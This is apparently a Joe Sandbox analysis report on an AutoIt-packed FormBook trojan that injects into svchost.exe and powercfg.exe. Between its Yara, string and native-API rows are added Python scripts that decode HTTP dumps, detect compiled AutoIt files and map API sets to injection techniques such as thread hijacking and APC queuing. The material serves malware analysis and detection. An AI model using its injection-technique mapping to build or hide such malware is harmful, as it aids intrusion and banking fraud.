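None of the HTTP responses logged above is C2 content: two nginx built-in 404 pages (548 bytes, padded with the six comments so browsers do not substitute their own error page), three nginx 403s with one chunked body, and two 404s with lowercase header names whose body is a "Website not found" placeholder. Telling a server default or a parking page apart from a real reply is routine when a sample contacts several domains, and the report's Data Raw column is the only record of a body once the Data Ascii column is cut off. The script below is added here as an example and is not part of Joe Sandbox: it turns a Data Raw dump back into bytes, tolerates a dump cut off mid-byte, removes chunked transfer framing and classifies the page. The two nginx bodies are rebuilt from the Data Ascii text in the rows above and come out at exactly 548 bytes, matching the Content-Length and the 0x224 chunk size; the placeholder page is a constructed fragment that shares only its title with the report's last two rows.

```python
"""Decode a Joe Sandbox 'Data Raw' HTTP body dump and say what kind of page it is.

Added example for this report; not part of Joe Sandbox. The nginx bodies are rebuilt
from the 'Data Ascii' text in the report rows; the placeholder page is a constructed
fragment that only shares its <title> with the report's last two rows.
"""
import re

PADDING = b"<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n"


def nginx_error_page(code: int, reason: str) -> bytes:
    """nginx's built-in error page, including the six padding comments seen in the report."""
    r = reason.encode()
    html = (b"<html>\r\n<head><title>%d %s</title></head>\r\n<body>\r\n"
            b"<center><h1>%d %s</h1></center>\r\n<hr><center>nginx</center>\r\n"
            b"</body>\r\n</html>\r\n" % (code, r, code, r))
    return html + PADDING * 6


def chunked(body: bytes) -> bytes:
    """Send body as one HTTP/1.1 chunk, the way the 403 in the report arrived."""
    return b"%x\r\n%s\r\n0\r\n\r\n" % (len(body), body)


def to_hex_dump(data: bytes) -> str:
    """Render bytes the way the report's 'Data Raw' column does."""
    return " ".join(f"{b:02x}" for b in data)


def from_hex_dump(dump: str) -> bytes:
    """Parse a 'Data Raw' dump; a dangling odd nibble (dump cut off mid-byte) is dropped."""
    tokens = dump.split()
    if tokens and len(tokens[-1]) != 2:
        tokens = tokens[:-1]
    return bytes(int(t, 16) for t in tokens)


def dechunk(raw: bytes) -> bytes:
    """Reassemble a chunked body; stops at the 0 chunk or where a truncated dump ends."""
    out, pos = bytearray(), 0
    while True:
        nl = raw.find(b"\r\n", pos)
        if nl < 0:
            break
        try:
            size = int(raw[pos:nl].split(b";")[0].strip() or b"0", 16)
        except ValueError:
            break
        if size == 0:
            break
        piece = raw[nl + 2:nl + 2 + size]
        out += piece
        if len(piece) < size:       # the dump ended inside this chunk
            break
        pos = nl + 2 + size + 2     # skip the CRLF that follows the chunk data
    return bytes(out)


TITLE = re.compile(rb"<title>([^<]*)</title>", re.I)


def classify(status: int, headers: dict, raw_dump: str) -> dict:
    """Decode one report row (status, headers, Data Raw) into status/title/body_len/verdict."""
    hdrs = {k.lower(): v for k, v in headers.items()}   # the last rows use lowercase names
    body = from_hex_dump(raw_dump)
    if "chunked" in hdrs.get("transfer-encoding", "").lower():
        body = dechunk(body)
    m = TITLE.search(body)
    title = m.group(1).decode("utf-8", "replace") if m else ""
    if b"<center>nginx</center>" in body and b"friendly error page" in body:
        verdict = "nginx built-in error page: nothing is served at that path"
    elif "website not found" in title.lower():
        verdict = "hosting placeholder page: the name resolves but no site is configured"
    else:
        verdict = "non-default content: inspect by hand"
    return {"status": status, "title": title, "body_len": len(body), "verdict": verdict}


# Rows mirroring the report: two nginx pages, and a placeholder dump cut off mid-byte.
ENTRY_404 = (404, {"Server": "nginx", "Content-Type": "text/html", "Content-Length": "548"},
             to_hex_dump(nginx_error_page(404, "Not Found")))
ENTRY_403 = (403, {"Server": "nginx", "Content-Type": "text/html; charset=utf-8",
                   "Transfer-Encoding": "chunked"},
             to_hex_dump(chunked(nginx_error_page(403, "Forbidden"))))
PLACEHOLDER = (b'<!doctype html>\n<html class="no-js" lang="">\n\n<head>\n'
               b'    <title>Website not found\xe2\x80\xa6</title>\n'
               b'    <meta name="description" content="">\n')      # constructed, 134 bytes
ENTRY_PARKED = (404, {"content-type": "text/html", "transfer-encoding": "chunked"},
                to_hex_dump(chunked(PLACEHOLDER))[:114 * 3 + 1])   # 114 bytes + a dangling nibble

if __name__ == "__main__":
    for entry in (ENTRY_404, ENTRY_403, ENTRY_PARKED):
        print(classify(*entry))
```

The verdicts only describe the server side. A 404 from a real C2 can be deliberate, so the useful signal is the contrast: the same sample talking to several names and getting defaults and placeholders from most of them, which is what the rows above show.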

                E-Banking Fraud

                Source: Yara match | File source: 2.2.svchost.exe.2600000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 2.2.svchost.exe.2600000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000005.00000002.2613375030.0000000002F20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000005.00000002.2613433985.0000000002F70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000004.00000002.2613432274.0000000002B50000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000002.1886277798.0000000002600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000002.1887212251.0000000004E10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000005.00000002.2610818121.0000000002A60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000008.00000002.2615837301.0000000005650000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000002.1886979901.0000000003390000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                System Summary

                Source: C:\Users\user\Desktop\wWXR5js3k2.exe | Code function: This is a third-party compi
led AutoIt script. | 0_2_00653B3A
                Source: wWXR5js3k2.exe | String found in binary or memory: This is a third-party compiled AutoIt script.
                Source: wWXR5js3k2.exe, 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: This is a third-party compiled AutoIt script. | memstr_bc2c5e6b-f
                Source: wWXR5js3k2.exe, 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer` | memstr_a6c17f90-e
                Source: wWXR5js3k2.exe | String found in binary or memory: This is a third-party compiled AutoIt script. | memstr_35741a0d-d
                Source: wWXR5js3k2.exe | String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer` | memstr_afce573b-8
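The rows above identify the dropper as a compiled AutoIt script: the runtime's own error-dialog text and the AutoIt3GUI window class are in the sample's image. Those strings confirm the packaging, not intent; plenty of legitimate administration tools are compiled AutoIt, so the same check will fire on them. The script below is added here as an example and is not part of Joe Sandbox or AutoIt: it looks for the two strings in both ASCII and UTF-16LE (AutoIt stores its text as UTF-16, which is why sandboxes report them from memory rather than from a plain strings run) and for the AU3!EA06 signature that precedes the embedded script. The signature bytes are the header AutoIt decompilers look for; the sample bytes are constructed and contain no real script.

```python
"""Check a file for the markers of a compiled AutoIt v3 script.

Added example for this report; not part of Joe Sandbox or AutoIt. The two runtime
strings are the ones quoted in the report rows; the script signature is the header
AutoIt decompilers look for. The sample bytes are constructed, with no real script.
"""
import sys

# 16-byte header plus "AU3!EA06": start of the embedded script resource in AutoIt v3.3 builds.
# The script data behind it is compressed and obfuscated, so this check finds it but cannot read it.
AU3_SIGNATURE = bytes.fromhex("a3484bbe986c4aa9994c530a86d6487d") + b"AU3!EA06"
DIALOG_TEXT = "This is a third-party compiled AutoIt script."   # runtime error-dialog text
GUI_CLASS = "AutoIt3GUI"                                         # window class of AutoIt GUIs

# AutoIt keeps its text as UTF-16LE, so each string is searched in both encodings.
MARKERS = {
    "script_signature": [AU3_SIGNATURE],
    "runtime_dialog_text": [DIALOG_TEXT.encode("ascii"), DIALOG_TEXT.encode("utf-16-le")],
    "gui_window_class": [GUI_CLASS.encode("ascii"), GUI_CLASS.encode("utf-16-le")],
}


def find_all(data: bytes, needle: bytes) -> list:
    """Offsets of every non-overlapping occurrence of needle in data."""
    hits, pos = [], data.find(needle)
    while pos != -1:
        hits.append(pos)
        pos = data.find(needle, pos + len(needle))
    return hits


def autoit_markers(data: bytes) -> dict:
    """{marker name: sorted offsets} for all three markers (empty lists when absent)."""
    return {name: sorted(off for pat in pats for off in find_all(data, pat))
            for name, pats in MARKERS.items()}


def is_compiled_autoit(data: bytes) -> bool:
    """True on the script signature alone, or on both runtime strings together."""
    m = autoit_markers(data)
    return bool(m["script_signature"]) or bool(m["runtime_dialog_text"] and m["gui_window_class"])


# Constructed stand-in for a compiled AutoIt binary: DOS stub, the runtime strings as UTF-16LE,
# then the script resource header. A plain PE-shaped blob is the negative case.
SAMPLE_AUTOIT = (b"MZ" + b"\x00" * 62
                 + DIALOG_TEXT.encode("utf-16-le") + b"\x00\x00"
                 + GUI_CLASS.encode("utf-16-le") + b"\x00\x00"
                 + b"\x00" * 16
                 + AU3_SIGNATURE + b"\x00" * 32)
SAMPLE_PLAIN = b"MZ" + b"\x00" * 200

if __name__ == "__main__":
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_AUTOIT
    for name, offsets in autoit_markers(data).items():
        print(f"{name:22} {[hex(o) for o in offsets]}")
    print("compiled AutoIt:", is_compiled_autoit(data))
```

A hit means the interesting logic is in the embedded script, which an AutoIt decompiler can recover; the report's verdict on this sample rests on what that script then does (the injection into svchost.exe and powercfg.exe and the FormBook Yara matches), not on the packaging.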
                Source: C:\Program Files (x86)\HCTPCPWVAaRPNZDJMLLmpfebDcpduzAzoyxboAfIKwDWQYOaDBseWgUwW\ycBMGRFRlht.exe | Process created: C:\Windows\SysWOW64\powercfg.exe "C:\Windows\SysWOW64\powercfg.exe"
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0262CD33 NtClose | 2_2_0262CD33
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03072B60 NtClose,LdrInitializeThunk | 2_2_03072B60
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03072DF0 NtQuerySystemInformation,LdrInitializeThunk | 2_2_03072DF0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030735C0 NtCreateMutant,LdrInitializeThunk | 2_2_030735C0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03074340 NtSetContextThread | 2_2_03074340
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03074650 NtSuspendThread | 2_2_03074650
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03072B80 NtQueryInformationFile | 2_2_03072B80
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03072BA0 NtEnumerateValueKey | 2_2_03072BA0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03072BE0 NtQueryValueKey | 2_2_03072BE0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03072BF0 NtAllocateVirtualMemory | 2_2_03072BF0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03072AB0 NtWaitForSingleObject | 2_2_03072AB0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03072AD0 NtReadFile | 2_2_03072AD0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03072AF0 NtWriteFile | 2_2_03072AF0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03072F30 NtCreateSection | 2_2_03072F30
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03072F60 NtCreateProcessEx | 2_2_03072F60
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03072F90 NtProtectVirtualMemory | 2_2_03072F90
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03072FA0 NtQuerySection | 2_2_03072FA0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03072FB0 NtResumeThread | 2_2_03072FB0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03072FE0 NtCreateFile | 2_2_03072FE0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03072E30 NtWriteVirtualMemory | 2_2_03072E30
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03072E80 NtReadVirtualMemory | 2_2_03072E80
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03072EA0 NtAdjustPrivilegesToken | 2_2_03072EA0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03072EE0 NtQueueApcThread | 2_2_03072EE0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03072D00 NtSetInformationFile | 2_2_03072D00
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03072D10 NtMapViewOfSection | 2_2_03072D10
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03072D30 NtUnmapViewOfSection | 2_2_03072D30
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03072DB0 NtEnumerateKey | 2_2_03072DB0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03072DD0 NtDelayExecution | 2_2_03072DD0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03072C00 NtQueryInformationProcess | 2_2_03072C00
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03072C60 NtCreateKey | 2_2_03072C60
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03072C70 NtFreeVirtualMemory | 2_2_03072C70
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03072CA0 NtQueryInformationToken | 2_2_03072CA0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03072CC0 NtQueryVirtualMemory | 2_2_03072CC0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03072CF0 NtOpenProcess | 2_2_03072CF0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03073010 NtOpenDirectoryObject | 2_2_03073010
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03073090 NtSetValueKey | 2_2_03073090
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030739B0 NtGetContextThread | 2_2_030739B0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03073D10 NtOpenProcessToken | 2_2_03073D10
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03073D70 NtOpenThread | 2_2_03073D70
                Source: C:\Windows\SysWOW64\powercfg.exe | Code function: 5_2_03324340 NtSetContextThread,LdrInitializeThunk | 5_2_03324340
                Source: C:\Windows\SysWOW64\powercfg.exe | Code function: 5_2_03324650 NtSuspendThread,LdrInitializeThunk | 5_2_03324650
                Source: C:\Windows\SysWOW64\powercfg.exe | Code function: 5_2_03322B60 NtClose,LdrInitializeThunk | 5_2_03322B60
                Source: C:\Windows\SysWOW64\powercfg.exe | Code function: 5_2_03322BA0 NtEnumerateValueKey,LdrInitializeThunk | 5_2_03322BA0
                Source: C:\Windows\SysWOW64\powercfg.exe | Code function: 5_2_03322BF0 NtAllocateVirtualMemory,LdrInitializeThunk | 5_2_03322BF0
                Source: C:\Windows\SysWOW64\powercfg.exe | Code function: 5_2_03322BE0 NtQueryValueKey,LdrInitializeThunk | 5_2_03322BE0
                Source: C:\Windows\SysWOW64\powercfg.exe | Code function: 5_2_03322AF0 NtWriteFile,LdrInitializeThunk | 5_2_03322AF0
                Source: C:\Windows\SysWOW64\powercfg.exe | Code function: 5_2_03322AD0 NtReadFile,LdrInitializeThunk | 5_2_03322AD0
                Source: C:\Windows\SysWOW64\powercfg.exe | Code function: 5_2_03322F30 NtCreateSection,LdrInitializeThunk | 5_2_03322F30
                Source: C:\Windows\SysWOW64\powercfg.exe | Code function: 5_2_03322FB0 NtResumeThread,LdrInitializeThunk | 5_2_03322FB0
                Source: C:\Windows\SysWOW64\powercfg.exe | Code function: 5_2_03322FE0 NtCreateFile,LdrInitializeThunk | 5_2_03322FE0
                Source: C:\Windows\SysWOW64\powercfg.exe | Code function: 5_2_03322E80 NtReadVirtualMemory,LdrInitializeThunk | 5_2_03322E80
                Source: C:\Windows\SysWOW64\powercfg.exe | Code function: 5_2_03322EE0 NtQueueApcThread,LdrInitializeThunk | 5_2_03322EE0
                Source: C:\Windows\SysWOW64\powercfg.exe | Code function: 5_2_03322D30 NtUnmapViewOfSection,LdrInitializeThunk | 5_2_03322D30
                Source: C:\Windows\SysWOW64\powercfg.exe | Code function: 5_2_03322D10 NtMapViewOfSection,LdrInitializeThunk | 5_2_03322D10
                Source: C:\Windows\SysWOW64\powercfg.exe | Code function: 5_2_03322DF0 NtQuerySystemInformation,LdrInitializeThunk | 5_2_03322DF0
                Source: C:\Windows\SysWOW64\powercfg.exe | Code function: 5_2_03322DD0 NtDelayExecution,LdrInitializeThunk | 5_2_03322DD0
                Source: C:\Windows\SysWOW64\powercfg.exe | Code function: 5_2_03322C70 NtFreeVirtualMemory,LdrInitializeThunk | 5_2_03322C70
                Source: C:\Windows\SysWOW64\powercfg.exe | Code function: 5_2_03322C60 NtCreateKey,LdrInitializeThunk | 5_2_03322C60
                Source: C:\Windows\SysWOW64\powercfg.exe | Code function: 5_2_03322CA0 NtQueryInformationToken,LdrInitializeThunk | 5_2_03322CA0
                Source: C:\Windows\SysWOW64\powercfg.exe | Code function: 5_2_033235C0 NtCreateMutant,LdrInitializeThunk | 5_2_033235C0
                Source: C:\Windows\SysWOW64\powercfg.exe | Code function: 5_2_033239B0 NtGetContextThread,LdrInitializeThunk | 5_2_033239B0
                Source: C:\Windows\SysWOW64\powercfg.exe | Code function: 5_2_03322B80 NtQueryInformationFile | 5_2_03322B80
                Source: C:\Windows\SysWOW64\powercfg.exe | Code function: 5_2_03322AB0 NtWaitForSingleObject | 5_2_03322AB0
                Source: C:\Windows\SysWOW64\powercfg.exe | Code function: 5_2_03322F60 NtCreateProcessEx | 5_2_03322F60
                Source: C:\Windows\SysWOW64\powercfg.exe | Code function: 5_2_03322FA0 NtQuerySection | 5_2_03322FA0
                Source: C:\Windows\SysWOW64\powercfg.exe | Code function: 5_2_03322F90 NtProtectVirtualMemory | 5_2_03322F90
                Source: C:\Windows\SysWOW64\powercfg.exe | Code function: 5_2_03322E30 NtWriteVirtualMemory | 5_2_03322E30
                Source: C:\Windows\SysWOW64\powercfg.exe | Code function: 5_2_03322EA0 NtAdjustPrivilegesToken | 5_2_03322EA0
                Source: C:\Windows\SysWOW64\powercfg.exe | Code function: 5_2_03322D00 NtSetInformationFile | 5_2_03322D00
                Source: C:\Windows\SysWOW64\powercfg.exe | Code function: 5_2_03322DB0 NtEnumerateKey | 5_2_03322DB0
                Source: C:\Windows\SysWOW64\powercfg.exe | Code function: 5_2_03322C00 NtQueryInformationProcess | 5_2_03322C00
                Source: C:\Windows\SysWOW64\powercfg.exe | Code function: 5_2_03322CF0 NtOpenProcess | 5_2_03322CF0
                Source: C:\Windows\SysWOW64\powercfg.exe | Code function: 5_2_03322CC0 NtQueryVirtualMemory | 5_2_03322CC0
                Source: C:\Windows\SysWOW64\powercfg.exe | Code function: 5_2_03323010 NtOpenDirectoryObject | 5_2_03323010
                Source: C:\Windows\SysWOW64\powercfg.exe | Code function: 5_2_03323090 NtSetValueKey | 5_2_03323090
                Source: C:\Windows\SysWOW64\powercfg.exe | Code function: 5_2_03323D10 NtOpenProcessToken | 5_2_03323D10
                Source: C:\Windows\SysWOW64\powercfg.exe | Code function: 5_2_03323D70 NtOpenThread | 5_2_03323D70
                Source: C:\Windows\SysWOW64\powercfg.exe | Code function: 5_2_02A89630 NtReadFile | 5_2_02A89630
                Source: C:\Windows\SysWOW64\powercfg.exe | Code function: 5_2_02A897C0 NtClose | 5_2_02A897C0
                Source: C:\Windows\SysWOW64\powercfg.exe | Code function: 5_2_02A89720 NtDeleteFile | 5_2_02A89720
                Source: C:\Windows\SysWOW64\powercfg.exe | Code function: 5_2_02A894C0 NtCreateFile | 5_2_02A894C0
                Source: C:\Windows\SysWOW64\powercfg.exe | Code function: 5_2_02A89920 NtAllocateVirtualMemory | 5_2_02A89920
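The Nt* rows above are the native-API stubs Joe Sandbox found in the code running inside svchost.exe and powercfg.exe, two Windows binaries that have no reason of their own to open other processes, suspend threads or queue APCs; the injection signatures in the overview are derived from sets like these. Reading eighty such rows by eye is slow, so the script below, added here as an example and not part of Joe Sandbox, parses rows in this format, collects the Nt* names per process (the LdrInitializeThunk entries are left out, they are not Nt calls) and reports which injection primitives are fully present. The primitive labels and API sets are the usual names for the techniques, not Joe Sandbox signature names; the sample rows are a subset of this report's rows, some with the fields run together as they come out of a raw copy of the report, which the parser accepts as well. The leading number of a function id is taken as the report's process number.

```python
"""Group 'Code function' rows by process and name the injection primitives they form.

Added example for this report; not part of Joe Sandbox. Rows are accepted with the
fields separated by ' | ' or run together. The API sets are the usual technique
definitions, not Joe Sandbox's signatures; the sample rows are a subset of this report.
"""
import re
from collections import defaultdict

ROW = re.compile(
    r"Source:\s*(?P<src>.+?)\s*\|?\s*Code function:\s*(?P<fid>\d+_\d+_[0-9A-Fa-f]{8}):?\s+"
    r"(?P<apis>[A-Za-z0-9_,\s]*?)[,\s|]*(?P=fid)\s*$"
)

# Every API in a set must be present in the same process for the primitive to count.
PRIMITIVES = {
    "remote write (open process, allocate, write)":
        {"NtOpenProcess", "NtAllocateVirtualMemory", "NtWriteVirtualMemory"},
    "section mapping (create section, map view)":
        {"NtCreateSection", "NtMapViewOfSection"},
    "APC injection (open thread, queue APC)":
        {"NtOpenThread", "NtQueueApcThread"},
    "thread hijack (suspend, get/set context, resume)":
        {"NtSuspendThread", "NtGetContextThread", "NtSetContextThread", "NtResumeThread"},
    "hollowing support (unmap, write, set context, resume)":
        {"NtUnmapViewOfSection", "NtWriteVirtualMemory", "NtSetContextThread", "NtResumeThread"},
}


def parse_rows(lines):
    """Yield ((exe path, process number), function id, [api names]) for each row that parses."""
    for line in lines:
        m = ROW.search(line)
        if not m:
            continue
        apis = [a.strip() for a in m.group("apis").split(",") if a.strip()]
        proc = m.group("fid").split("_")[0]      # leading number = process in the report
        yield (m.group("src").strip(), proc), m.group("fid"), apis


def native_apis_by_process(lines):
    """{(exe path, process number): set of Nt* names seen in that process's analysed code}."""
    seen = defaultdict(set)
    for key, _fid, apis in parse_rows(lines):
        seen[key].update(a for a in apis if a.startswith("Nt"))   # drops LdrInitializeThunk
    return dict(seen)


def injection_primitives(lines):
    """{(exe path, process number): [labels of primitives whose API set is fully present]}."""
    return {key: [label for label, need in PRIMITIVES.items() if need <= apis]
            for key, apis in native_apis_by_process(lines).items()}


# Subset of this report's rows: svchost.exe with separators, powercfg.exe run together,
# and one of the sample's own rows, which has no API list and contributes nothing.
SAMPLE_ROWS = [
    r"Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03074340 NtSetContextThread | 2_2_03074340",
    r"Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03074650 NtSuspendThread | 2_2_03074650",
    r"Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030739B0 NtGetContextThread | 2_2_030739B0",
    r"Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03072FB0 NtResumeThread | 2_2_03072FB0",
    r"Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03072F30 NtCreateSection | 2_2_03072F30",
    r"Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03072D10 NtMapViewOfSection | 2_2_03072D10",
    r"Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03072D30 NtUnmapViewOfSection | 2_2_03072D30",
    r"Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03072E30 NtWriteVirtualMemory | 2_2_03072E30",
    r"Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03072EE0 NtQueueApcThread | 2_2_03072EE0",
    r"Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03073D70 NtOpenThread | 2_2_03073D70",
    r"Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03072CF0 NtOpenProcess | 2_2_03072CF0",
    r"Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03072BF0 NtAllocateVirtualMemory | 2_2_03072BF0",
    r"Source: C:\Windows\SysWOW64\powercfg.exeCode function: 5_2_03322EE0 NtQueueApcThread,LdrInitializeThunk,5_2_03322EE0",
    r"Source: C:\Windows\SysWOW64\powercfg.exeCode function: 5_2_03323D70 NtOpenThread,5_2_03323D70",
    r"Source: C:\Windows\SysWOW64\powercfg.exeCode function: 5_2_03322B60 NtClose,LdrInitializeThunk,5_2_03322B60",
    r"Source: C:\Windows\SysWOW64\powercfg.exeCode function: 5_2_02A89630 NtReadFile,5_2_02A89630",
    r"Source: C:\Users\user\Desktop\wWXR5js3k2.exe | Code function: 0_2_0065E6A0 | 0_2_0065E6A0",
]

if __name__ == "__main__":
    for (exe, proc), labels in injection_primitives(SAMPLE_ROWS).items():
        print(f"process {proc} {exe}:")
        for label in labels or ["no complete injection primitive"]:
            print("   ", label)
```

Having a primitive's APIs in injected code shows capability, not use; the report's "Writes to foreign memory regions", "Queues an APC" and "Modifies the context of a thread" signatures come from calls it observed, and that is the evidence to cite.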
                Source: C:\Users\user\Desktop\wWXR5js3k2.exeCode function: 0_2_006BA1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,0_2_006BA1EF
                Source: C:\Users\user\Desktop\wWXR5js3k2.exeCode function: 0_2_006A8310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_006A8310
                Source: C:\Users\user\Desktop\wWXR5js3k2.exeCode function: 0_2_006B51BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_006B51BD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 030AEA12 appears 86 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0302B970 appears 275 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 030BF290 appears 105 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03075130 appears 56 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03087E54 appears 99 times
                Source: C:\Users\user\Desktop\wWXR5js3k2.exeCode function: String function: 00670AE3 appears 70 times
                Source: C:\Users\user\Desktop\wWXR5js3k2.exeCode function: String function: 00678900 appears 42 times
                Source: C:\Users\user\Desktop\wWXR5js3k2.exeCode function: String function: 00657DE1 appears 35 times
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: String function: 032DB970 appears 280 times
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: String function: 03337E54 appears 110 times
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: String function: 0336F290 appears 105 times
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: String function: 03325130 appears 58 times
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: String function: 0335EA12 appears 86 times
                Source: wWXR5js3k2.exe, 00000000.00000003.1368366440.000000000396D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs wWXR5js3k2.exe
                Source: wWXR5js3k2.exe, 00000000.00000003.1366990523.00000000037C3000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs wWXR5js3k2.exe
                Source: wWXR5js3k2.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/5@6/5
                Source: C:\Users\user\Desktop\wWXR5js3k2.exeCode function: 0_2_006BA06A GetLastError,FormatMessageW,0_2_006BA06A
                Source: C:\Users\user\Desktop\wWXR5js3k2.exeCode function: 0_2_006A81CB AdjustTokenPrivileges,CloseHandle,0_2_006A81CB
                Source: C:\Users\user\Desktop\wWXR5js3k2.exeCode function: 0_2_006A87E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_006A87E1
                Source: C:\Users\user\Desktop\wWXR5js3k2.exeCode function: 0_2_006BB333 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_006BB333
                Source: C:\Users\user\Desktop\wWXR5js3k2.exeCode function: 0_2_006CEE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_006CEE0D
